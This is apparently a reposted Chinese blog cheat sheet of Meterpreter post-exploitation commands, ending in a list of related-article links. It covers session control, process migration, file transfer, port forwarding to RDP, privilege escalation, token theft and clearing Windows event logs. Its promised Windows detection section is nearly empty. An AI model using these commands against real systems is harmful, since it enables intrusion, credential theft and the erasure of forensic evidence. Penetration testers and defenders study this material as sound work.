渗透中Meterpreter基本操作和对应的windows上的排查或者现象
Meterpreter的简单介绍
Meterpreter 是MSF自带一个强大的SHELL,可以执行很多功能。
Meterpreter SHELL
基本操作
meterpreter>background #session隐藏到后台
meterpreter>bgkill #杀掉后台的一个meterpreter
meterpreter>bglist #列出后台的meterpreter
meterpreter>bgrun #运行后台的一个meterpreter
msf> sessions -l #查看回话session的list
msf> sessions 4 #切回四号回话,用于和background反操作
查看系统信息
meterpreter>sysinfo #获取系统信息
meterpreter>getuid #获取当前注入的用户名称
转移注入进程
meterpreter>ps #查看进程list
meterpreter>migrate pid #转移注入点的继承
转移注入进程后,源进程被杀掉,并不影响meterpreter的会话
文件和路径类的操作
meterpreter>ls
meterpreter>pwd
meterpreter>mkdir
meterpreter>mv
meterpreter>rm
meterpreter>rmdir
#以上常见操作不在赘述
meterpreter>show_mount #展示磁盘情况
meterpreter>search -d c:\\ -f *.doc # -d 路径 -f 文件名模式 搜索文件 例如搜索日志文件 *.evtx
meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上传文件
meterpreter>download c:\\xxx\xxx.xxx /root/... #下载文件
meterpreter>edit xxx #编辑文件,VIM的
网络配置及其命令
meterpreter>arp #展示arp
meterpreter>getproxy #获取代理信息
meterpreter>ifconfig(ipconfig) #查看网卡信息
meterpreter>route #打印路由
meterpreter>netstat #查看网络连接情况
meterpreter>resolve #dns解析
meterpreter>portfwd #端口转发portfwd add -l 1122 -p 3389 -r 192.168.250.176
系统操作及其命令
meterpreter>shell #获取cmdshell
meterpreter>clearev #清除event log
meterpreter>execute #执行command
meterpreter>getpid(getuid、getdsid)
meterpreter>getpriv #提权
meterpreter>shutdown #关机
meterpreter>reboot #重启
meterpreter>steal_token #窃取token
meterpreter>sysinfo #系统信息
meterpreter>localtime #获取系统时间
用户接口指令操作
Windows排查
进程
任务管理器看不到,但是tasklist和netstat 可以看到
转载于:https://www.cnblogs.com/KevinGeorge/p/9264936.html
渗透中Meterpreter基本操作和对应的windows上的排查或者现象相关推荐
- java 中window_教你如何在windows上安装Java
最近够倒霉的,电脑硬盘坏了,重新做了个系统,各种环境全都没了,/(ㄒoㄒ)/~~ 然后我发现自己在重新安装各种环境的时候,有些东西竟然还需要去查,所以决定把这些环境的配置都写成博客记录下来. 今天就教 ...
- 在windows上安装Postgresql,安装空间数据库postgis引擎,创建可以存储空间点线面的数据库,解决could not open extension control file问题
在windows上安装Postgresql,安装空间数据库postgis引擎,创建可以存储空间点线面的数据库,解决could not open extension control file问题 前面问 ...
- 快速发布windows上的web项目【免费内网穿透】
快速发布windows上的web项目[免费内网穿透] 文章目录 快速发布windows上的web项目[免费内网穿透] 什么是cpolar内网穿透? 概述 1. 搭建一个静态Web站点 1.1 下载演示 ...
- telegraf gpu_在Windows上使用Telegraf监控nvidia gpu
telegraf gpu Telegraf | 英伟达| 监控| Grafana | InfluxDB (Telegraf | Nvidia | Monitoring | Grafana | Infl ...
- 后渗透之meterpreter学习笔记
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下. Meterpreter是Metasploit框架中的一个扩展模块, ...
- MSF后渗透模块Meterpreter
目录 后门 persistence metsvc 图形界面 getgui 信息收集 判断目标是不是虚拟机 arp主机发现 nmap主机发现 dumplink-最近访问的文件记录 enum_applic ...
- 渗透测试-[Meterpreter后渗透25招]
渗透测试-[后渗透25招] 0.实验环境 1.MS08-067漏洞描述[RPC] 2.主机发现 3 利用MSF通过ms08-067漏洞渗透目标系统 4.后渗透利用 4.1.系统信息搜集 (1)获取系统 ...
- pstools套件在渗透中的应用详解
其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少. 当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解. pstool的介 ...
- asp.net web新闻发布系统_Web.config在渗透中的作用
前言 本文主要介绍web.config文件在渗透中的作用,即可上传一个web.config时的思路,话不多说,开始正题.首先我们来看一下web.config是什么,援引百度百科的介绍: Web.con ...
最新文章
- Linux 并发服务器雏形总结
- SCAPY pcap文件数据分析 python3
- 点击按钮改变div的颜色
- 分布式架构中一致性解决方案——Zookeeper集群搭建
- 使用Mockito在Java中进行模拟入门
- 20180813-20180817
- Java中间件:淘宝网系统高性能利器
- 解决Sharepoint每天第一次打开速度慢的问题
- vue获取上传进度_vue通过input选取apk文件上传,显示进度条
- 电商促销海报设计技巧!
- linux 命令启动菜单栏,Linux守护进程的启动方法
- 2018-03-28 Linux学习
- 经纬度坐标相互转换度分秒
- 常用坐标系介绍及转换方式
- MD5在线加密,带盐
- 2017年中国互联网企业100强排行榜
- Metasploit进行渗透测试的常用流程【入门】
- 2023湖北师范大学计算机考研信息汇总
- 百度网盘 备份mysql数据库_利用百度云免费备份SQL数据库
- 程序员必修内功,收集了上千本各类编程书籍【免费获取】